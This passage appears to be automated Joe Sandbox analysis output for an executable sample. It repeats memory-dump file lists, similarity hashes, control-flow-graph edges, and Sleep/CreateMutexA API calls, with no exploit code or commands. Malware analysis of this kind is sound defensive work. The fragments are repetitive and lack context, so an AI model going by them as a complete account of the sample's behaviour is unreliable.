                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                • Opcode ID: 5063ddcacb56b53c9ad7f3a70654b7a0844b96e25ba32612d9e0bc77b8353469
                                                                                                                                                                                                • Instruction ID: 30bb797b2c104e2cbfc3536982df6109cdb97e7fe60f531e7356379a5f3be65b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5063ddcacb56b53c9ad7f3a70654b7a0844b96e25ba32612d9e0bc77b8353469
                                                                                                                                                                                                • Instruction Fuzzy Hash: DD3129717001089BEB0C9B78DE8DF6DB7A2EBC1318F28522CE025B73D5D77689828752
                                                                                                                                                                                                Function 00ECA54D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 349 eca54d-eca56d 353 eca56f-eca57b 349->353 354 eca59b-eca5b7 349->354 357 eca57d-eca58b 353->357 358 eca591-eca598 call edd663 353->358 355 eca5b9-eca5c5 354->355 356 eca5e5-eca604 354->356 359 eca5db-eca5e2 call edd663 355->359 360 eca5c7-eca5d5 355->360 361 eca606-eca612 356->361 362 eca632-eca916 call ed80c0 356->362 357->358 363 eca944-eca949 call ef6c6a 357->363 358->354 359->356 360->359 360->363 368 eca628-eca62f call edd663 361->368 369 eca614-eca622 361->369 375 eca94e 363->375 376 eca949 call ef6c6a 363->376 368->362 369->363 369->368 379 eca953-eca994 Sleep CreateMutexA 375->379 380 eca94e call ef6c6a 375->380 376->375 383 eca996-eca998 379->383 384 eca9a7-eca9a8 379->384 380->379 383->384 385 eca99a-eca9a5 383->385 385->384
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00ECA963
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00F23254), ref: 00ECA981
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                • Opcode ID: fc94dcbe772b0ebfa4f96a376500e4e1ec4323ccc17167a8b08b8c091650d11f
                                                                                                                                                                                                • Instruction ID: 52130025be4cf51a75ba5cca091af5b25919a9c692fe8431e9939b8b3f81b7be
                                                                                                                                                                                                • Opcode Fuzzy Hash: fc94dcbe772b0ebfa4f96a376500e4e1ec4323ccc17167a8b08b8c091650d11f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D312C717041088BEB18DB78DE89F6DB762EBC5318F28922CE414F73D5D73689828712
                                                                                                                                                                                                Function 00ECA682 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 387 eca682-eca6a2 391 eca6a4-eca6b0 387->391 392 eca6d0-eca6ec 387->392 393 eca6c6-eca6cd call edd663 391->393 394 eca6b2-eca6c0 391->394 395 eca6ee-eca6fa 392->395 396 eca71a-eca739 392->396 393->392 394->393 399 eca949 394->399 401 eca6fc-eca70a 395->401 402 eca710-eca717 call edd663 395->402 397 eca73b-eca747 396->397 398 eca767-eca916 call ed80c0 396->398 404 eca75d-eca764 call edd663 397->404 405 eca749-eca757 397->405 407 eca94e 399->407 408 eca949 call ef6c6a 399->408 401->399 401->402 402->396 404->398 405->399 405->404 413 eca953-eca994 Sleep CreateMutexA 407->413 414 eca94e call ef6c6a 407->414 408->407 419 eca996-eca998 413->419 420 eca9a7-eca9a8 413->420 414->413 419->420 421 eca99a-eca9a5 419->421 421->420
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00ECA963
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00F23254), ref: 00ECA981
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                • Opcode ID: 059eadf06a7d385368b2e9fc6b24fc260858194b01ed36eefeb3efcb0e599ba9
                                                                                                                                                                                                • Instruction ID: ac7526fa693545caef0a4d73aaa09a7729ddbb4e3cb86caa4f7570600c3cab1e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 059eadf06a7d385368b2e9fc6b24fc260858194b01ed36eefeb3efcb0e599ba9
                                                                                                                                                                                                • Instruction Fuzzy Hash: F53129717041088BEB189B78DE89B6DB7A2EBC1318F28922DE014F72D5D77689828752
                                                                                                                                                                                                Function 00EC9ADC Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 423 ec9adc-ec9ae8 424 ec9afe-ec9d91 call edd663 call ed7a00 call ec5c10 call ec8b30 call ed8220 call ed7a00 call ec5c10 call ec8b30 call ed8220 423->424 425 ec9aea-ec9af8 423->425 425->424 426 eca917 425->426 428 eca953-eca994 Sleep CreateMutexA 426->428 429 eca917 call ef6c6a 426->429 434 eca996-eca998 428->434 435 eca9a7-eca9a8 428->435 429->428 434->435 437 eca99a-eca9a5 434->437 437->435
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00ECA963
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00F23254), ref: 00ECA981
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                • Opcode ID: e5f93cb2307734e8bf126028b99825d154703a676bf2f4058147573969c230ea
                                                                                                                                                                                                • Instruction ID: b34bb002cb6ba96a00d4ee2ab6a23db2348144916330651cb2be3568dbc2fe30
                                                                                                                                                                                                • Opcode Fuzzy Hash: e5f93cb2307734e8bf126028b99825d154703a676bf2f4058147573969c230ea
                                                                                                                                                                                                • Instruction Fuzzy Hash: 53216A317042049BEB189F68EE8DB6DF362EBC1314F28522DE418E72D6D77689828711
                                                                                                                                                                                                Function 00ECA856 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
